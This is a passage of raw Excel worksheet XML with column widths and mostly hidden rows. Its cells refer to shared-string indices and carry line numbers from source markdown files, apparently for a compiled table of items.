    <tableColumn id="12" xr3:uid="{00000000-0010-0000-0000-00000C000000}" name="Source Markdown file"/>
    <tableColumn id="13" xr3:uid="{00000000-0010-0000-0000-00000D000000}" name="Source section"/>
    <tableColumn id="14" xr3:uid="{00000000-0010-0000-0000-00000E000000}" name="Start line"/>
    <tableColumn id="15" xr3:uid="{00000000-0010-0000-0000-00000F000000}" name="End line"/>
    <tableColumn id="16" xr3:uid="{00000000-0010-0000-0000-000010000000}" name="Source compil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D57"/>
  </sheetPr>
  <dimension ref="A1:P934"/>
  <sheetViews>
    <sheetView showGridLines="0" tabSelected="1" workbookViewId="0">
      <selection activeCell="G678" sqref="G678"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.125" customWidth="1"/>
    <col min="2" max="2" width="58" customWidth="1"/>
    <col min="3" max="3" width="14.375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="35.875" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="8" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="11.375" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="20.75" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="150" customWidth="1"/>
    <col min="9" max="9" width="149.875" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="149.375" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="10.5" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="44.75" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="41.875" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="12.125" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="11.375" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="18.5" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16">
      <c r="A1" s="1"/>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
      <c r="K1" s="1"/>
      <c r="L1" s="1"/>
      <c r="M1" s="1"/>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1"/>
    </row>
    <row r="2" spans="1:16" ht="20.25">
      <c r="A2" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1"/>
      <c r="D2" s="1"/>
      <c r="E2" s="1"/>
      <c r="F2" s="1"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
      <c r="M2" s="1"/>
      <c r="N2" s="1"/>
      <c r="O2" s="1"/>
      <c r="P2" s="1"/>
    </row>
    <row r="3" spans="1:16">
      <c r="A3" s="1" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="1"/>
      <c r="C3" s="1"/>
      <c r="D3" s="1"/>
      <c r="E3" s="1"/>
      <c r="F3" s="1"/>
      <c r="G3" s="1"/>
      <c r="H3" s="1"/>
      <c r="I3" s="1"/>
      <c r="J3" s="1"/>
      <c r="K3" s="1"/>
      <c r="L3" s="1"/>
      <c r="M3" s="1"/>
      <c r="N3" s="1"/>
      <c r="O3" s="1"/>
      <c r="P3" s="1"/>
    </row>
    <row r="4" spans="1:16">
      <c r="A4" s="3" t="s">
        <v>2</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1"/>
      <c r="D4" s="1"/>
      <c r="E4" s="1"/>
      <c r="F4" s="1"/>
      <c r="G4" s="1"/>
      <c r="H4" s="1"/>
      <c r="I4" s="1"/>
      <c r="J4" s="1"/>
      <c r="K4" s="1"/>
      <c r="L4" s="1"/>
      <c r="M4" s="1"/>
      <c r="N4" s="1"/>
      <c r="O4" s="1"/>
      <c r="P4" s="1"/>
    </row>
    <row r="5" spans="1:16">
      <c r="A5" s="1"/>
      <c r="B5" s="1"/>
      <c r="C5" s="1"/>
      <c r="D5" s="1"/>
      <c r="E5" s="1"/>
      <c r="F5" s="1"/>
      <c r="G5" s="1"/>
      <c r="H5" s="1"/>
      <c r="I5" s="1"/>
      <c r="J5" s="1"/>
      <c r="K5" s="1"/>
      <c r="L5" s="1"/>
      <c r="M5" s="1"/>
      <c r="N5" s="1"/>
      <c r="O5" s="1"/>
      <c r="P5" s="1"/>
    </row>
    <row r="6" spans="1:16">
      <c r="A6" s="7" t="s">
        <v>3</v>
      </c>
      <c r="B6" s="7" t="s">
        <v>4</v>
      </c>
      <c r="C6" s="7" t="s">
        <v>5</v>
      </c>
      <c r="D6" s="7" t="s">
        <v>6</v>
      </c>
      <c r="E6" s="7" t="s">
        <v>7</v>
      </c>
      <c r="F6" s="7" t="s">
        <v>8</v>
      </c>
      <c r="G6" s="7" t="s">
        <v>9</v>
      </c>
      <c r="H6" s="7" t="s">
        <v>10</v>
      </c>
      <c r="I6" s="7" t="s">
        <v>11</v>
      </c>
      <c r="J6" s="7" t="s">
        <v>12</v>
      </c>
      <c r="K6" s="8" t="s">
        <v>13</v>
      </c>
      <c r="L6" s="7" t="s">
        <v>14</v>
      </c>
      <c r="M6" s="7" t="s">
        <v>15</v>
      </c>
      <c r="N6" s="7" t="s">
        <v>16</v>
      </c>
      <c r="O6" s="7" t="s">
        <v>17</v>
      </c>
      <c r="P6" s="7" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="7" spans="1:16" ht="204" hidden="1">
      <c r="A7" s="4" t="s">
        <v>19</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>20</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H7" s="4" t="s">
        <v>26</v>
      </c>
      <c r="I7" s="4"/>
      <c r="J7" s="4"/>
      <c r="K7" s="9"/>
      <c r="L7" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M7" s="4" t="s">
        <v>28</v>
      </c>
      <c r="N7" s="5">
        <v>66</v>
      </c>
      <c r="O7" s="5">
        <v>82</v>
      </c>
      <c r="P7" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="8" spans="1:16" ht="204" hidden="1">
      <c r="A8" s="4" t="s">
        <v>29</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>30</v>
      </c>
      <c r="C8" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E8" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G8" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H8" s="4" t="s">
        <v>32</v>
      </c>
      <c r="I8" s="4"/>
      <c r="J8" s="4"/>
      <c r="K8" s="9"/>
      <c r="L8" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M8" s="4" t="s">
        <v>28</v>
      </c>
      <c r="N8" s="5">
        <v>83</v>
      </c>
      <c r="O8" s="5">
        <v>99</v>
      </c>
      <c r="P8" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="9" spans="1:16" ht="267.75" hidden="1">
      <c r="A9" s="4" t="s">
        <v>33</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>34</v>
      </c>
      <c r="C9" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E9" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G9" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H9" s="4" t="s">
        <v>35</v>
      </c>
      <c r="I9" s="4" t="s">
        <v>36</v>
      </c>
      <c r="J9" s="4"/>
      <c r="K9" s="9"/>
      <c r="L9" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M9" s="4" t="s">
        <v>28</v>
      </c>
      <c r="N9" s="5">
        <v>100</v>
      </c>
      <c r="O9" s="5">
        <v>121</v>
      </c>
      <c r="P9" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="10" spans="1:16" ht="255" hidden="1">
      <c r="A10" s="4" t="s">
        <v>37</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>38</v>
      </c>
      <c r="C10" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E10" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G10" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H10" s="4" t="s">
        <v>39</v>
      </c>
      <c r="I10" s="4" t="s">
        <v>36</v>
      </c>
      <c r="J10" s="4"/>
      <c r="K10" s="9"/>
      <c r="L10" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M10" s="4" t="s">
        <v>28</v>
      </c>
      <c r="N10" s="5">
        <v>122</v>
      </c>
      <c r="O10" s="5">
        <v>142</v>
      </c>
      <c r="P10" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="11" spans="1:16" ht="242.25" hidden="1">
      <c r="A11" s="4" t="s">
        <v>40</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>41</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E11" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G11" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H11" s="4" t="s">
        <v>42</v>
      </c>
      <c r="I11" s="4"/>
      <c r="J11" s="4"/>
      <c r="K11" s="9"/>
      <c r="L11" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M11" s="4" t="s">
        <v>28</v>
      </c>
      <c r="N11" s="5">
        <v>143</v>
      </c>
      <c r="O11" s="5">
        <v>162</v>
      </c>
      <c r="P11" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="12" spans="1:16" ht="255" hidden="1">
      <c r="A12" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B12" s="4" t="s">
        <v>44</v>
      </c>
      <c r="C12" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D12" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E12" s="4" t="s">
        <v>45</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G12" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H12" s="4" t="s">
        <v>46</v>
      </c>
      <c r="I12" s="4" t="s">
        <v>47</v>
      </c>
      <c r="J12" s="4"/>
      <c r="K12" s="9"/>
      <c r="L12" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M12" s="4" t="s">
        <v>48</v>
      </c>
      <c r="N12" s="5">
        <v>165</v>
      </c>
      <c r="O12" s="5">
        <v>190</v>
      </c>
      <c r="P12" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="13" spans="1:16" ht="267.75" hidden="1">
      <c r="A13" s="4" t="s">
        <v>49</v>
      </c>
      <c r="B13" s="4" t="s">
        <v>50</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E13" s="4" t="s">
        <v>45</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G13" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H13" s="4" t="s">
        <v>51</v>
      </c>
      <c r="I13" s="4"/>
      <c r="J13" s="4"/>
      <c r="K13" s="9"/>
      <c r="L13" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M13" s="4" t="s">
        <v>48</v>
      </c>
      <c r="N13" s="5">
        <v>191</v>
      </c>
      <c r="O13" s="5">
        <v>212</v>
      </c>
      <c r="P13" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="14" spans="1:16" ht="242.25" hidden="1">
      <c r="A14" s="4" t="s">
        <v>52</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>53</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E14" s="4" t="s">
        <v>45</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G14" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H14" s="4" t="s">
        <v>55</v>
      </c>
      <c r="I14" s="4"/>
      <c r="J14" s="4"/>
      <c r="K14" s="9"/>
      <c r="L14" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M14" s="4" t="s">
        <v>48</v>
      </c>
      <c r="N14" s="5">
        <v>213</v>
      </c>
      <c r="O14" s="5">
        <v>232</v>
      </c>
      <c r="P14" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="15" spans="1:16" ht="229.5" hidden="1">
      <c r="A15" s="4" t="s">
        <v>56</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>57</v>
      </c>
      <c r="C15" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D15" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E15" s="4" t="s">
        <v>45</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G15" s="4" t="s">
        <v>58</v>
      </c>
      <c r="H15" s="4" t="s">
        <v>59</v>
      </c>
      <c r="I15" s="4"/>
      <c r="J15" s="4"/>
      <c r="K15" s="9"/>
      <c r="L15" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M15" s="4" t="s">
        <v>48</v>
      </c>
      <c r="N15" s="5">
        <v>233</v>
      </c>
      <c r="O15" s="5">
        <v>251</v>
      </c>
      <c r="P15" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="16" spans="1:16" ht="242.25" hidden="1">
      <c r="A16" s="4" t="s">
        <v>60</v>
      </c>
      <c r="B16" s="4" t="s">
        <v>61</v>
      </c>
      <c r="C16" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D16" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E16" s="4" t="s">
        <v>45</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G16" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H16" s="4" t="s">
        <v>62</v>
      </c>
      <c r="I16" s="4"/>
      <c r="J16" s="4"/>
      <c r="K16" s="9"/>
      <c r="L16" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M16" s="4" t="s">
        <v>48</v>
      </c>
      <c r="N16" s="5">
        <v>252</v>
      </c>
      <c r="O16" s="5">
        <v>271</v>
      </c>
      <c r="P16" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="17" spans="1:16" ht="242.25" hidden="1">
      <c r="A17" s="4" t="s">
        <v>63</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>64</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D17" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E17" s="4" t="s">
        <v>45</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G17" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H17" s="4" t="s">
        <v>65</v>
      </c>
      <c r="I17" s="4"/>
      <c r="J17" s="4"/>
      <c r="K17" s="9"/>
      <c r="L17" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M17" s="4" t="s">
        <v>48</v>
      </c>
      <c r="N17" s="5">
        <v>272</v>
      </c>
      <c r="O17" s="5">
        <v>291</v>
      </c>
      <c r="P17" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="18" spans="1:16" ht="25.5" hidden="1">
      <c r="A18" s="4" t="s">
        <v>66</v>
      </c>
      <c r="B18" s="4" t="s">
        <v>67</v>
      </c>
      <c r="C18" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D18" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E18" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F18" s="4"/>
      <c r="G18" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H18" s="4" t="s">
        <v>69</v>
      </c>
      <c r="I18" s="4"/>
      <c r="J18" s="4"/>
      <c r="K18" s="9"/>
      <c r="L18" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M18" s="4" t="s">
        <v>70</v>
      </c>
      <c r="N18" s="5">
        <v>298</v>
      </c>
      <c r="O18" s="5">
        <v>298</v>
      </c>
      <c r="P18" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="19" spans="1:16" ht="25.5" hidden="1">
      <c r="A19" s="4" t="s">
        <v>71</v>
      </c>
      <c r="B19" s="4" t="s">
        <v>72</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E19" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F19" s="4"/>
      <c r="G19" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H19" s="4" t="s">
        <v>73</v>
      </c>
      <c r="I19" s="4"/>
      <c r="J19" s="4"/>
      <c r="K19" s="9"/>
      <c r="L19" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M19" s="4" t="s">
        <v>70</v>
      </c>
      <c r="N19" s="5">
        <v>299</v>
      </c>
      <c r="O19" s="5">
        <v>299</v>
      </c>
      <c r="P19" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="20" spans="1:16" ht="38.25" hidden="1">
      <c r="A20" s="4" t="s">
        <v>74</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>75</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E20" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F20" s="4"/>
      <c r="G20" s="4" t="s">
        <v>58</v>
      </c>
      <c r="H20" s="4" t="s">
        <v>76</v>
      </c>
      <c r="I20" s="4"/>
      <c r="J20" s="4"/>
      <c r="K20" s="9"/>
      <c r="L20" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M20" s="4" t="s">
        <v>70</v>
      </c>
      <c r="N20" s="5">
        <v>300</v>
      </c>
      <c r="O20" s="5">
        <v>300</v>
      </c>
      <c r="P20" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="21" spans="1:16" ht="25.5" hidden="1">
      <c r="A21" s="4" t="s">
        <v>77</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>78</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F21" s="4"/>
      <c r="G21" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H21" s="4" t="s">
        <v>79</v>
      </c>
      <c r="I21" s="4"/>
      <c r="J21" s="4"/>
      <c r="K21" s="9"/>
      <c r="L21" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M21" s="4" t="s">
        <v>70</v>
      </c>
      <c r="N21" s="5">
        <v>301</v>
      </c>
      <c r="O21" s="5">
        <v>301</v>
      </c>
      <c r="P21" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="22" spans="1:16" hidden="1">
      <c r="A22" s="4" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="4" t="s">
        <v>81</v>
      </c>
      <c r="C22" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D22" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E22" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F22" s="4"/>
      <c r="G22" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H22" s="4" t="s">
        <v>82</v>
      </c>
      <c r="I22" s="4"/>
      <c r="J22" s="4"/>
      <c r="K22" s="9"/>
      <c r="L22" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M22" s="4" t="s">
        <v>70</v>
      </c>
      <c r="N22" s="5">
        <v>302</v>
      </c>
      <c r="O22" s="5">
        <v>302</v>
      </c>
      <c r="P22" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="23" spans="1:16" ht="25.5" hidden="1">
      <c r="A23" s="4" t="s">
        <v>83</v>
      </c>
      <c r="B23" s="4" t="s">
        <v>84</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E23" s="4" t="s">
        <v>68</v>
      </c>
      <c r="F23" s="4"/>
      <c r="G23" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H23" s="4" t="s">
        <v>85</v>
      </c>
      <c r="I23" s="4"/>
      <c r="J23" s="4"/>
      <c r="K23" s="9"/>
      <c r="L23" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M23" s="4" t="s">
        <v>70</v>
      </c>
      <c r="N23" s="5">
        <v>303</v>
      </c>
      <c r="O23" s="5">
        <v>303</v>
      </c>
      <c r="P23" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="24" spans="1:16" ht="165.75" hidden="1">
      <c r="A24" s="4" t="s">
        <v>86</v>
      </c>
      <c r="B24" s="4" t="s">
        <v>87</v>
      </c>
      <c r="C24" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D24" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E24" s="4" t="s">
        <v>88</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G24" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H24" s="4" t="s">
        <v>89</v>
      </c>
      <c r="I24" s="4"/>
      <c r="J24" s="4"/>
      <c r="K24" s="9"/>
      <c r="L24" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M24" s="4" t="s">
        <v>90</v>
      </c>
      <c r="N24" s="5">
        <v>312</v>
      </c>
      <c r="O24" s="5">
        <v>325</v>
      </c>
      <c r="P24" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="25" spans="1:16" ht="178.5" hidden="1">
      <c r="A25" s="4" t="s">
        <v>91</v>
      </c>
      <c r="B25" s="4" t="s">
        <v>92</v>
      </c>
      <c r="C25" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D25" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E25" s="4" t="s">
        <v>88</v>
      </c>
      <c r="F25" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G25" s="4" t="s">
        <v>58</v>
      </c>
      <c r="H25" s="4" t="s">
        <v>93</v>
      </c>
      <c r="I25" s="4"/>
      <c r="J25" s="4"/>
      <c r="K25" s="9"/>
      <c r="L25" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M25" s="4" t="s">
        <v>90</v>
      </c>
      <c r="N25" s="5">
        <v>326</v>
      </c>
      <c r="O25" s="5">
        <v>340</v>
      </c>
      <c r="P25" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="26" spans="1:16" ht="229.5" hidden="1">
      <c r="A26" s="4" t="s">
        <v>94</v>
      </c>
      <c r="B26" s="4" t="s">
        <v>95</v>
      </c>
      <c r="C26" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D26" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E26" s="4" t="s">
        <v>88</v>
      </c>
      <c r="F26" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G26" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H26" s="4" t="s">
        <v>96</v>
      </c>
      <c r="I26" s="4"/>
      <c r="J26" s="4"/>
      <c r="K26" s="9"/>
      <c r="L26" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M26" s="4" t="s">
        <v>90</v>
      </c>
      <c r="N26" s="5">
        <v>341</v>
      </c>
      <c r="O26" s="5">
        <v>359</v>
      </c>
      <c r="P26" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="27" spans="1:16" ht="153" hidden="1">
      <c r="A27" s="4" t="s">
        <v>97</v>
      </c>
      <c r="B27" s="4" t="s">
        <v>98</v>
      </c>
      <c r="C27" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D27" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E27" s="4" t="s">
        <v>88</v>
      </c>
      <c r="F27" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G27" s="4" t="s">
        <v>58</v>
      </c>
      <c r="H27" s="4" t="s">
        <v>99</v>
      </c>
      <c r="I27" s="4"/>
      <c r="J27" s="4"/>
      <c r="K27" s="9"/>
      <c r="L27" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M27" s="4" t="s">
        <v>90</v>
      </c>
      <c r="N27" s="5">
        <v>360</v>
      </c>
      <c r="O27" s="5">
        <v>372</v>
      </c>
      <c r="P27" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="28" spans="1:16" ht="204" hidden="1">
      <c r="A28" s="4" t="s">
        <v>100</v>
      </c>
      <c r="B28" s="4" t="s">
        <v>101</v>
      </c>
      <c r="C28" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D28" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E28" s="4" t="s">
        <v>88</v>
      </c>
      <c r="F28" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G28" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H28" s="4" t="s">
        <v>102</v>
      </c>
      <c r="I28" s="4"/>
      <c r="J28" s="4"/>
      <c r="K28" s="9"/>
      <c r="L28" s="4" t="s">
        <v>27</v>
      </c>
      <c r="M28" s="4" t="s">
        <v>90</v>
      </c>
      <c r="N28" s="5">
        <v>373</v>
      </c>
      <c r="O28" s="5">
        <v>389</v>
      </c>
      <c r="P28" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="29" spans="1:16" ht="242.25" hidden="1">
      <c r="A29" s="4" t="s">
        <v>103</v>
      </c>
      <c r="B29" s="4" t="s">
        <v>104</v>
      </c>
      <c r="C29" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D29" s="4" t="s">
        <v>105</v>
      </c>
      <c r="E29" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F29" s="4" t="s">
        <v>106</v>
      </c>
      <c r="G29" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H29" s="4" t="s">
        <v>107</v>
      </c>
      <c r="I29" s="4"/>
      <c r="J29" s="4"/>
      <c r="K29" s="9"/>
      <c r="L29" s="4" t="s">
        <v>108</v>
      </c>
      <c r="M29" s="4" t="s">
        <v>109</v>
      </c>
      <c r="N29" s="5">
        <v>63</v>
      </c>
      <c r="O29" s="5">
        <v>82</v>
      </c>
      <c r="P29" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="30" spans="1:16" ht="229.5" hidden="1">
      <c r="A30" s="4" t="s">
        <v>110</v>
      </c>
      <c r="B30" s="4" t="s">
        <v>111</v>
      </c>
      <c r="C30" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D30" s="4" t="s">
        <v>105</v>
      </c>
      <c r="E30" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F30" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G30" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H30" s="4" t="s">
        <v>112</v>
      </c>
      <c r="I30" s="4"/>
      <c r="J30" s="4"/>
      <c r="K30" s="9"/>
      <c r="L30" s="4" t="s">
        <v>108</v>
      </c>
      <c r="M30" s="4" t="s">
        <v>109</v>
      </c>
      <c r="N30" s="5">
        <v>83</v>
      </c>
      <c r="O30" s="5">
        <v>101</v>
      </c>
      <c r="P30" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="31" spans="1:16" ht="204" hidden="1">
      <c r="A31" s="4" t="s">
        <v>113</v>
      </c>
      <c r="B31" s="4" t="s">
        <v>114</v>
      </c>
      <c r="C31" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D31" s="4" t="s">
        <v>105</v>
      </c>
      <c r="E31" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F31" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G31" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H31" s="4" t="s">
        <v>115</v>
      </c>
      <c r="I31" s="4"/>
      <c r="J31" s="4"/>
      <c r="K31" s="9"/>
      <c r="L31" s="4" t="s">
        <v>108</v>
      </c>
      <c r="M31" s="4" t="s">
        <v>109</v>
      </c>
      <c r="N31" s="5">
        <v>102</v>
      </c>
      <c r="O31" s="5">
        <v>118</v>
      </c>
      <c r="P31" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="32" spans="1:16" ht="242.25" hidden="1">
      <c r="A32" s="4" t="s">
        <v>116</v>
      </c>
      <c r="B32" s="4" t="s">
        <v>117</v>
      </c>
      <c r="C32" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D32" s="4" t="s">
        <v>105</v>
      </c>
      <c r="E32" s="4" t="s">
        <v>23</v>
      </c>
      <c r="F32" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G32" s="4" t="s">
        <v>25</v>
      </c>
      <c r="H32" s="4" t="s">
        <v>118</v>
      </c>
      <c r="I32" s="4"/>
      <c r="J32" s="4"/>
      <c r="K32" s="9"/>
      <c r="L32" s="4" t="s">
        <v>108</v>
      </c>
      <c r="M32" s="4" t="s">
        <v>109</v>
      </c>
      <c r="N32" s="5">
        <v>119</v>
      </c>
      <c r="O32" s="5">
        <v>137</v>
      </c>
      <c r="P32" s="6">
        <v>46266</v>
      </c>
    </row>
    <row r="33" spans="1:16" ht="216.75" hidden="1">
      <c r="A33" s="4" t="s">
        <v>119</v>
      </c>
